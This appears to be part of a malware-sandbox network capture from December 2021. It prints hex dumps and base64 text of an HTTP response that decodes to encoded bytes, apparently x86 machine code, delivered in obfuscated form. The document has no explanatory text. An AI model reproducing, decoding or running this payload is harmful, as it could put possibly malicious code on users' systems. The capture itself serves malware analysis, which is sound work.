                                                                Data Ascii: YEY4LGBGRixgRkYsYDFELGAxNyxgMUIsYDEyLGBDNyxgODUsYEUwLGBGOCxgRkYsYEZGLGAwQixgMEQsYDA5LGAwRSxgQzcsYDg1LGBFNCxgRjgsYEZGLGBGRixgQUQsYEM3LGA4QixgRjIsYEM3LGA4NSxgRTgsYEY4LGBGRixgRkYsYEI5LGBBOCxgQjYsYDJELGBDNyxgODUsYEVDLGBGOCxgRkYsYEZGLGBDOCxgQTksYDFFLGAxNCxgQzc
                                                                2021-12-02 20:47:22 UTC956INData Raw: 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 30 51 73 59 45 59 30 4c 47 42 44 4d 53 78 67 52 6b 59 73 59 44 41 34 4c 47 41 34 4d 53 78 67 52 54 63 73 59 45 5a 47 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 30 4d 73 59 45 49 34 4c 47 41 77 4e 43 78 67 51 7a 45 73 59 45 4e 47 4c 47 41 78 4d 43 78 67 4f 45 49 73 59 45 52 46 4c 47 42 44 4d 53 78 67 52 6b 49 73 59 44 45 77 4c 47 41 34 4d 53 78 67 52 54 4d 73 59 45 5a 47 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 55 4d 73 59 44 6b 34 4c 47 41 77 4e 43 78 67 51 7a 45 73 59 45 4e 43 4c 47 41 77 4f 43 78 67 4d 7a 4d 73 59 45 5a 43 4c 47 41 34 51 69 78 67 4e 55 51 73 59 45 59 34 4c 47 41 34 4d 53 78 67 52 54 4d
                                                                Data Ascii: YDAwLGAwMCxgMDAsYDAwLGA4QixgN0QsYEY0LGBDMSxgRkYsYDA4LGA4MSxgRTcsYEZGLGAwMCxgMDAsYDAwLGA4QixgN0MsYEI4LGAwNCxgQzEsYENGLGAxMCxgOEIsYERFLGBDMSxgRkIsYDEwLGA4MSxgRTMsYEZGLGAwMCxgMDAsYDAwLGA4QixgNUMsYDk4LGAwNCxgQzEsYENCLGAwOCxgMzMsYEZCLGA4QixgNUQsYEY4LGA4MSxgRTM
                                                                2021-12-02 20:47:22 UTC972INData Raw: 59 44 59 34 4c 47 41 34 52 43 78 67 4f 44 55 73 59 44 45 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 55 77 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 45 59 34 4c 47 41 79 4d 43 78 67 4e 7a 67 73 59 44 4d 34 4c 47 41 7a 4e 69 78 67 51 7a 59 73 59 44 51 31 4c 47 42 47 51 79 78 67 4d 44 41 73 59 45 4d 33 4c 47 41 30 4e 53 78 67 52 6a 41 73 59 44 49 77 4c 47 41 33 4f 43 78 67 4d 7a 59 73 59 44 4d 30 4c 47 42 44 4e 69 78 67 4e 44 55 73 59 45 59 30 4c 47 41 77 4d 43 78 67 51 7a 63 73 59 44 67 31 4c 47 42 47 4f 43 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 41 73 59 44 41 77 4c 47 41 33 4d 69 78 67 4d 44 41 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 52 6b 4d 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59
                                                                Data Ascii: YDY4LGA4RCxgODUsYDEwLGBGRixgRkYsYEZGLGA2QSxgMDAsYDUwLGBDNyxgNDUsYEY4LGAyMCxgNzgsYDM4LGAzNixgQzYsYDQ1LGBGQyxgMDAsYEM3LGA0NSxgRjAsYDIwLGA3OCxgMzYsYDM0LGBDNixgNDUsYEY0LGAwMCxgQzcsYDg1LGBGOCxgRkUsYEZGLGBGRixgNTAsYDAwLGA3MixgMDAsYEM3LGA4NSxgRkMsYEZFLGBGRixgRkY
                                                                2021-12-02 20:47:22 UTC988INData Raw: 59 44 68 43 4c 47 41 33 4e 53 78 67 4d 44 67 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 30 4c 47 41 34 52 43 78 67 4f 44 55 73 59 45 56 44 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 31 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 42 43 4d 43 78 67 4e 6a 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 44 51 73 59 44 68 45 4c 47 41 34 52 43 78 67 52 54 51 73 59 45 5a 43 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 78 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 6c 47 4c 47 41 32 4e 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 54 55 73 59 45 56 44 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 31 4d 69 78 67 52 54 67 73 59 44 49 7a 4c 47 41 33 4e 79 78 67 4d 44 45
                                                                Data Ascii: YDhCLGA3NSxgMDgsYDZBLGAwMCxgNkEsYDA0LGA4RCxgODUsYEVDLGBGRCxgRkYsYEZGLGA1MCxgNTYsYEU4LGBCMCxgNjYsYDAwLGAwMCxgNkEsYDAwLGA2QSxgMDQsYDhELGA4RCxgRTQsYEZCLGBGRixgRkYsYDUxLGA1NixgRTgsYDlGLGA2NixgMDAsYDAwLGA4RCxgOTUsYEVDLGBGRCxgRkYsYEZGLGA1MixgRTgsYDIzLGA3NyxgMDE
                                                                2021-12-02 20:47:22 UTC1004INData Raw: 59 45 49 34 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 55 49 73 59 44 68 43 4c 47 42 46 4e 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41 34 4e 53 78 67 52 45 49 73 59 44 42 47 4c 47 41 34 4e 53 78 67 51 54 67 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 43 4c 47 41 31 4e 53 78 67 4d 44 67 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 45 4d 73 59 44 5a 42 4c 47 41 77 4e 53 78 67 4e 54 49 73 59 44 55 77 4c 47 42 46 51 69 78 67 51 54 6b 73 59 45 4e 44 4c 47 42 44 51 79 78 67 51 30 4d 73 59 45 4e 44 4c 47 42 44 51 79 78 67 51 30 4d 73 59 44 55 31 4c 47 41 34 51 69 78 67 52 55 4d 73 59 44 67 78 4c 47 42 46 51 79 78 67 4f 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 55 7a 4c 47 41 31 4e 69 78 67 4e 54 63
                                                                Data Ascii: YEI4LGAwMSxgMDAsYDAwLGAwMCxgNUIsYDhCLGBFNSxgNUQsYEMzLGA4NSxgREIsYDBGLGA4NSxgQTgsYEZELGBGRixgRkYsYDhCLGA1NSxgMDgsYDhCLGA0NSxgMEMsYDZBLGAwNSxgNTIsYDUwLGBFQixgQTksYENDLGBDQyxgQ0MsYENDLGBDQyxgQ0MsYDU1LGA4QixgRUMsYDgxLGBFQyxgODAsYDAwLGAwMCxgMDAsYDUzLGA1NixgNTc
                                                                2021-12-02 20:47:22 UTC1020INData Raw: 59 44 56 47 4c 47 41 31 52 43 78 67 51 7a 4d 73 59 44 67 7a 4c 47 42 43 4f 43 78 67 4e 6a 51 73 59 44 45 31 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 33 4e 43 78 67 4d 45 4d 73 59 44 55 33 4c 47 42 46 4f 43 78 67 52 54 49 73 59 44 49 30 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 44 51 73 59 44 56 47 4c 47 41 31 52 43 78 67 51 7a 4d 73 59 44 55 32 4c 47 41 7a 4d 79 78 67 52 6a 59 73 59 44 4d 35 4c 47 41 33 4e 79 78 67 4d 55 4d 73 59 44 63 32 4c 47 41 30 4e 43 78 67 4f 45 51 73 59 44 59 30 4c 47 41 79 4e 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 30 4e 79 78 67 4d 54 67 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4e 7a 51 73 59 44 4d 35 4c 47 41 34 4d 79 78 67 4e 30 4d 73 59 45 59 77 4c 47 41 77 4e 43 78 67 4d 44 41
                                                                Data Ascii: YDVGLGA1RCxgQzMsYDgzLGBCOCxgNjQsYDE1LGAwMCxgMDAsYDAwLGA3NCxgMEMsYDU3LGBFOCxgRTIsYDI0LGAwMSxgMDAsYDgzLGBDNCxgMDQsYDVGLGA1RCxgQzMsYDU2LGAzMyxgRjYsYDM5LGA3NyxgMUMsYDc2LGA0NCxgOEQsYDY0LGAyNCxgMDAsYDhCLGA0NyxgMTgsYDg1LGBDMCxgNzQsYDM5LGA4MyxgN0MsYEYwLGAwNCxgMDA
                                                                2021-12-02 20:47:22 UTC1036INData Raw: 59 44 5a 42 4c 47 41 77 4e 53 78 67 4f 45 51 73 59 44 51 31 4c 47 42 47 4f 43 78 67 4e 54 41 73 59 44 55 32 4c 47 42 46 4f 43 78 67 4e 54 67 73 59 44 55 30 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 55 32 4c 47 42 46 4f 43 78 67 4d 6a 49 73 59 44 55 7a 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 68 43 4c 47 41 30 52 43 78 67 4d 44 67 73 59 44 55 7a 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 55 34 4c 47 41 31 4d 53 78 67 4d 44 4d 73 59 45 4d 32 4c 47 41 31 4d 43 78 67 52 54 67 73 59 44 51 79 4c 47 41 31 4d 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 30 59 73 59 44 41 30 4c 47 41 34 51 69 78 67 4f 54 63 73 59 44 5a 44 4c 47 41 78 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 44 55 73 59 45 55 34 4c 47 41 31 4d 69 78 67 4e 6b 45
                                                                Data Ascii: YDZBLGAwNSxgOEQsYDQ1LGBGOCxgNTAsYDU2LGBFOCxgNTgsYDU0LGAwMSxgMDAsYDU2LGBFOCxgMjIsYDUzLGAwMSxgMDAsYDhCLGA0RCxgMDgsYDUzLGA4OSxgNDUsYEU4LGA1MSxgMDMsYEM2LGA1MCxgRTgsYDQyLGA1MCxgMDEsYDAwLGA4QixgN0YsYDA0LGA4QixgOTcsYDZDLGAxMSxgMDAsYDAwLGA4QixgNDUsYEU4LGA1MixgNkE
                                                                2021-12-02 20:47:22 UTC1052INData Raw: 59 44 55 79 4c 47 41 32 52 43 78 67 51 54 45 73 59 44 6c 46 4c 47 41 77 4e 79 78 67 4d 7a 4d 73 59 44 4e 45 4c 47 41 7a 52 69 78 67 52 44 6b 73 59 44 46 43 4c 47 42 44 52 43 78 67 52 44 59 73 59 45 51 34 4c 47 41 79 4f 43 78 67 4d 55 45 73 59 44 64 47 4c 47 42 44 4d 79 78 67 4e 6b 4d 73 59 44 4a 45 4c 47 41 34 4d 43 78 67 4e 54 67 73 59 45 45 30 4c 47 41 77 4f 53 78 67 52 54 41 73 59 45 49 31 4c 47 41 30 4e 69 78 67 52 6a 45 73 59 45 59 78 4c 47 42 47 4d 53 78 67 4d 30 4d 73 59 45 59 31 4c 47 42 43 51 69 78 67 52 6a 41 73 59 45 4e 42 4c 47 41 33 4d 53 78 67 52 54 49 73 59 44 67 77 4c 47 42 43 51 53 78 67 52 44 4d 73 59 44 6c 46 4c 47 41 79 4d 79 78 67 4e 6b 55 73 59 45 59 34 4c 47 41 77 4e 53 78 67 51 55 4d 73 59 44 6b 33 4c 47 42 43 51 69 78 67 4d 54 55
                                                                Data Ascii: YDUyLGA2RCxgQTEsYDlFLGAwNyxgMzMsYDNELGAzRixgRDksYDFCLGBDRCxgRDYsYEQ4LGAyOCxgMUEsYDdGLGBDMyxgNkMsYDJELGA4MCxgNTgsYEE0LGAwOSxgRTAsYEI1LGA0NixgRjEsYEYxLGBGMSxgM0MsYEY1LGBCQixgRjAsYENBLGA3MSxgRTIsYDgwLGBCQSxgRDMsYDlFLGAyMyxgNkUsYEY4LGAwNSxgQUMsYDk3LGBCQixgMTU
                                                                2021-12-02 20:47:22 UTC1068INData Raw: 59 44 41 77 4c 47 41 77 4d 69 78 67 4d 44 41 73 59 44 41 77 4c 47 42 46 4f 43 78 67 4e 6b 49 73 59 44 4a 46 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 55 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 45 55 34 4c 47 41 34 4d 79 78 67 4d 6b 55 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 45 51 34 4c 47 41 34 51 69 78 67 4e 44 4d 73 59 44 49 34 4c 47 41 31 4d 43 78 67 52 54 67 73 59 44 4d 34 4c 47 41 7a 51 69 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 54 4d 73 59 44 49 34 4c 47 41 34 52 43 78 67 4e 45 4d 73 59 44 41 77 4c 47 41 77 4d 69 78 67 4e 54 45 73 59 44 55 79 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 4d 35 4c 47 41 7a 4f 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 69 78 67 4f 45 51
                                                                Data Ascii: YDAwLGAwMixgMDAsYDAwLGBFOCxgNkIsYDJFLGAwMSxgMDAsYDUwLGA2QSxgMDAsYEU4LGA4MyxgMkUsYDAxLGAwMCxgOEIsYEQ4LGA4QixgNDMsYDI4LGA1MCxgRTgsYDM4LGAzQixgMDEsYDAwLGA4QixgNTMsYDI4LGA4RCxgNEMsYDAwLGAwMixgNTEsYDUyLGA1NixgRTgsYDM5LGAzOCxgMDEsYDAwLGA2QSxgMDAsYDZBLGAwMixgOEQ
                                                                2021-12-02 20:47:22 UTC1084INData Raw: 59 44 67 35 4c 47 41 34 52 43 78 67 4e 7a 67 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 55 34 4c 47 42 45 4f 53 78 67 4d 6b 4d 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 4e 47 4c 47 41 34 52 43 78 67 4f 54 55 73 59 44 63 35 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 55 79 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 45 59 34 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 51 7a 63 73 59 44 51 31 4c 47 42 47 51 79 78 67 4d 6b 51 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 4d 32 4c 47 41 34 4e 53 78 67 4e 7a 67 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 77 4c 47 42 46 4f 43 78 67 51 6a 51 73 59 44 4a 44 4c 47 41 77 4d 53 78 67 4d 44 41
                                                                Data Ascii: YDg5LGA4RCxgNzgsYEZELGBGRixgRkYsYEU4LGBEOSxgMkMsYDAxLGAwMCxgNkEsYDNGLGA4RCxgOTUsYDc5LGBGRixgRkYsYEZGLGA2QSxgMDAsYDUyLGBDNyxgNDUsYEY4LGAwMCxgMDAsYDAwLGAwMCxgQzcsYDQ1LGBGQyxgMkQsYDAwLGAwMCxgMDAsYEM2LGA4NSxgNzgsYEZGLGBGRixgRkYsYDAwLGBFOCxgQjQsYDJDLGAwMSxgMDA
                                                                2021-12-02 20:47:22 UTC1100INData Raw: 59 44 41 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 6b 77 4c 47 41 34 51 69 78 67 51 7a 45 73 59 45 4d 78 4c 47 42 46 4d 43 78 67 4d 54 67 73 59 45 4a 46 4c 47 41 77 4f 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 6c 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 33 4f 53 78 67 4d 44 6b 73 59 44 41 7a 4c 47 42 44 4d 43 78 67 4d 7a 55 73 59 45 49 33 4c 47 41 78 52 43 78 67 51 7a 45 73 59 44 41 30 4c 47 42 46 51 69 78 67 4d 44 49 73 59 44 41 7a 4c 47 42 44 4d 43 78 67 4e 45 55 73 59 44 63 31 4c 47 42 46 52 53 78 67 4f 44 6b 73 59 44 41 79 4c 47 41 30 4d 53 78 67 4f 44 4d 73 59 45 4d 79 4c 47 41 77 4e 43 78 67 4e 45 59 73 59 44 63 31 4c 47 42 45 4e 53 78 67 4e 55 59
                                                                Data Ascii: YDAxLGAwMCxgMDAsYDkwLGA4QixgQzEsYEMxLGBFMCxgMTgsYEJFLGAwOCxgMDAsYDAwLGAwMCxgOEQsYDlCLGAwMCxgMDAsYDAwLGAwMCxgODUsYEMwLGA3OSxgMDksYDAzLGBDMCxgMzUsYEI3LGAxRCxgQzEsYDA0LGBFQixgMDIsYDAzLGBDMCxgNEUsYDc1LGBFRSxgODksYDAyLGA0MSxgODMsYEMyLGAwNCxgNEYsYDc1LGBENSxgNUY
                                                                2021-12-02 20:47:22 UTC1116INData Raw: 59 44 46 45 4c 47 41 77 52 69 78 67 51 6a 59 73 59 44 55 78 4c 47 41 77 4d 69 78 67 4d 45 59 73 59 45 49 32 4c 47 41 30 4f 53 78 67 4d 44 4d 73 59 44 68 42 4c 47 41 34 4e 43 78 67 4d 54 55 73 59 44 41 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 44 4d 43 78 67 52 54 41 73 59 44 41 32 4c 47 41 77 51 53 78 67 4f 44 51 73 59 44 42 45 4c 47 41 77 4d 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 44 59 73 59 44 67 34 4c 47 41 30 4e 69 78 67 52 6b 59 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 45 4d 73 59 45 59 33 4c 47 42 45 52 69 78 67 4f 44 4d 73 59 45 55 33 4c 47 41 77 4d 79 78 67 4d 6b 49 73 59 45 4d 33 4c 47 41 31 52 69 78 67 51 7a 59 73 59 44 41 32 4c 47 41 77 4d 43 78 67 4e 55 55 73 59 44 68 43 4c 47 42 46 4e 53 78 67 4e 55 51
                                                                Data Ascii: YDFELGAwRixgQjYsYDUxLGAwMixgMEYsYEI2LGA0OSxgMDMsYDhBLGA4NCxgMTUsYDAwLGBGRixgRkYsYEZGLGBDMCxgRTAsYDA2LGAwQSxgODQsYDBELGAwMCxgRkYsYEZGLGBGRixgNDYsYDg4LGA0NixgRkYsYDhCLGA0NSxgMEMsYEY3LGBERixgODMsYEU3LGAwMyxgMkIsYEM3LGA1RixgQzYsYDA2LGAwMCxgNUUsYDhCLGBFNSxgNUQ
                                                                2021-12-02 20:47:22 UTC1132INData Raw: 59 45 46 42 4c 47 42 44 52 53 78 67 4d 54 45 73 59 45 45 30 4c 47 41 35 52 53 78 67 51 7a 63 73 59 44 51 31 4c 47 42 42 52 53 78 67 4e 44 51 73 59 44 51 31 4c 47 41 31 4d 79 78 67 4e 54 51 73 59 44 59 32 4c 47 41 34 4f 53 78 67 4e 55 51 73 59 45 49 79 4c 47 42 47 52 69 78 67 4e 54 55 73 59 45 45 77 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 42 47 4c 47 41 34 4e 53 78 67 51 30 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 31 4e 53 78 67 52 6a 67 73 59 44 68 43 4c 47 41 7a 4d 69 78 67 4f 45 51 73 59 44 51 31 4c 47 42 47 51 79 78 67 4e 54 41 73 59 45 49 35 4c 47 41 77 4f 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6a 59 73 59 44 67 35 4c 47 41 30 52 43 78 67 51 7a 51 73 59 44 68 43 4c 47 41 33 52 43 78 67 51 7a 51
                                                                Data Ascii: YEFBLGBDRSxgMTEsYEE0LGA5RSxgQzcsYDQ1LGBBRSxgNDQsYDQ1LGA1MyxgNTQsYDY2LGA4OSxgNUQsYEIyLGBGRixgNTUsYEEwLGA4NSxgQzAsYDBGLGA4NSxgQ0EsYDAwLGAwMCxgMDAsYDhCLGA1NSxgRjgsYDhCLGAzMixgOEQsYDQ1LGBGQyxgNTAsYEI5LGAwOCxgMDAsYDAwLGAwMCxgNjYsYDg5LGA0RCxgQzQsYDhCLGA3RCxgQzQ
                                                                2021-12-02 20:47:22 UTC1143INData Raw: 51 34 4c 47 42 46 51 69 78 67 4d 44 4d 73 59 44 68 43 4c 47 41 31 52 43 78 67 52 6a 67 73 59 44 67 7a 4c 47 41 33 52 43 78 67 4d 44 67 73 59 44 41 77 4c 47 41 33 4e 43 78 67 4d 55 51 73 59 44 5a 42 4c 47 41 30 51 79 78 67 4e 54 59 73 59 45 55 34 4c 47 42 43 4d 53 78 67 4f 45 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 55 31 4c 47 41 77 4f 43 78 67 4e 54 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 69 78 67 4e 54 63 73 59 45 55 34 4c 47 41 32 4d 69 78 67 4f 54 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 51 79 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 51 79 78 67 52 54 67 73 59 44 5a 47 4c 47 41 7a 4d 79 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 4f 53 78 67 4e 7a 41 73 59
                                                                Data Ascii: Q4LGBFQixgMDMsYDhCLGA1RCxgRjgsYDgzLGA3RCxgMDgsYDAwLGA3NCxgMUQsYDZBLGA0QyxgNTYsYEU4LGBCMSxgOEYsYDAwLGAwMCxgOEIsYDU1LGAwOCxgNTAsYDZBLGAwMCxgNkEsYDAwLGA1MixgNTcsYEU4LGA2MixgOTAsYDAwLGAwMCxgODMsYEM0LGAxQyxgODksYDQ1LGBGQyxgRTgsYDZGLGAzMyxgMDEsYDAwLGA4OSxgNzAsY
                                                                2021-12-02 20:47:22 UTC1159INData Raw: 41 79 4c 47 41 32 4f 43 78 67 4f 45 49 73 59 44 51 33 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 68 45 4c 47 41 33 51 79 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 6b 73 59 44 41 34 4c 47 41 34 51 69 78 67 4d 54 63 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 54 51 73 59 44 5a 42 4c 47 41 77 4d 69 78 67 4e 54 49 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 44 41 34 4c 47 41 31 4d 53 78 67 4e 54 59 73 59 45 55 34 4c 47 42 45 4e 53 78 67 52 6b 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 79 4d 43 78 67 4f 44 6b 73 59 44 67 31 4c 47 41 33 51 79 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 30 49 73 59 45 4d 7a 4c 47 41 33 4e 43 78 67 4e 44 4d 73 59 44 68 43 4c 47 41 30 4e 53 78 67 52 6b 4d 73 59
                                                                Data Ascii: AyLGA2OCxgOEIsYDQ3LGAwOCxgOEIsYDhELGA3QyxgRkQsYEZGLGBGRixgODksYDA4LGA4QixgMTcsYDhCLGA0NSxgMTQsYDZBLGAwMixgNTIsYDUwLGA4RCxgNEQsYDA4LGA1MSxgNTYsYEU4LGBENSxgRkEsYEZGLGBGRixgODMsYEM0LGAyMCxgODksYDg1LGA3QyxgRkQsYEZGLGBGRixgM0IsYEMzLGA3NCxgNDMsYDhCLGA0NSxgRkMsY
                                                                2021-12-02 20:47:22 UTC1175INData Raw: 42 44 4c 47 41 31 4d 69 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 44 55 73 59 44 41 34 4c 47 41 31 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 42 43 4e 79 78 67 52 6b 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 79 4d 43 78 67 4f 44 4d 73 59 45 4a 46 4c 47 41 31 4e 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 63 30 4c 47 41 79 4e 53 78 67 4f 45 51 73 59 44 68 45 4c 47 41 77 4d 43 78 67 52 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 45 73 59 45 55 34 4c 47 42 45 52 69 78 67 52 55 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 4d 73 59 45 4d 77 4c 47 41 31 4d 43 78 67 4f 45 49 73 59 44 67 32 4c 47 41 31 4e 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59
                                                                Data Ascii: BDLGA1MixgNkEsYDAwLGA4RCxgNDUsYDA4LGA1MCxgNTYsYEU4LGBCNyxgRkEsYEZGLGBGRixgODMsYEM0LGAyMCxgODMsYEJFLGA1NCxgMEIsYDAwLGAwMCxgMDAsYDc0LGAyNSxgOEQsYDhELGAwMCxgRkMsYEZGLGBGRixgNTEsYEU4LGBERixgRUEsYDAwLGAwMCxgMDMsYEMwLGA1MCxgOEIsYDg2LGA1NCxgMEIsYDAwLGAwMCxgOEQsY
                                                                2021-12-02 20:47:22 UTC1191INData Raw: 41 77 4c 47 41 34 51 69 78 67 52 6a 67 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 55 4d 73 59 44 67 31 4c 47 42 47 52 69 78 67 4d 45 59 73 59 44 67 30 4c 47 41 35 51 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 45 73 59 45 5a 47 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 34 4c 47 41 77 4d 43 78 67 4e 7a 59 73 59 44 41 33 4c 47 42 43 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4f 43 78 67 4d 44 41 73 59 45 56 43 4c 47 41 77 4e 53 78 67 4f 44 4d 73 59 45 5a 47 4c 47 41 30 4f 43 78 67 4e 7a 59 73 59 44 55 77 4c 47 41 31 4d 79 78 67 4f 45 49 73 59 44 6c 46 4c 47 42 45 4f 43 78 67 4d 44 63 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 55 73 59 45 52 43 4c 47 41 33 4e 43 78 67 4e 44 51 73 59 44 5a 42 4c 47 41 77 4e 53 78 67 4f 45 51 73 59
                                                                Data Ascii: AwLGA4QixgRjgsYDgzLGBDNCxgMUMsYDg1LGBGRixgMEYsYDg0LGA5QixgMDAsYDAwLGAwMCxgODEsYEZGLGAwMCxgMDAsYDA4LGAwMCxgNzYsYDA3LGBCRixgMDAsYDAwLGAwOCxgMDAsYEVCLGAwNSxgODMsYEZGLGA0OCxgNzYsYDUwLGA1MyxgOEIsYDlFLGBEOCxgMDcsYDAwLGAwMCxgODUsYERCLGA3NCxgNDQsYDZBLGAwNSxgOEQsY
                                                                2021-12-02 20:47:22 UTC1207INData Raw: 41 77 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 54 55 73 59 44 68 45 4c 47 41 34 52 53 78 67 52 6a 41 73 59 44 41 34 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 55 78 4c 47 41 31 4e 69 78 67 51 7a 63 73 59 44 67 77 4c 47 41 7a 4d 43 78 67 4d 6a 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 55 34 4c 47 41 32 4f 43 78 67 4e 55 4d 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 4d 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 33 4e 43 78 67 4d 45 45 73 59 44 55 77 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 5a 42 4c 47 42 47 52 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 34 4c 47 41 31 52 53 78 67 4e 55 51 73 59
                                                                Data Ascii: AwLGAwMCxgNkEsYDAwLGA2QSxgMTUsYDhELGA4RSxgRjAsYDA4LGAwMCxgMDAsYDUxLGA1NixgQzcsYDgwLGAzMCxgMjAsYDAwLGAwMCxgMDEsYDAwLGAwMCxgMDAsYEU4LGA2OCxgNUMsYDAwLGAwMCxgODMsYEM0LGAxMCxgODUsYEMwLGA3NCxgMEEsYDUwLGA1NixgRTgsYDZBLGBGRSxgRkYsYEZGLGA4MyxgQzQsYDA4LGA1RSxgNUQsY
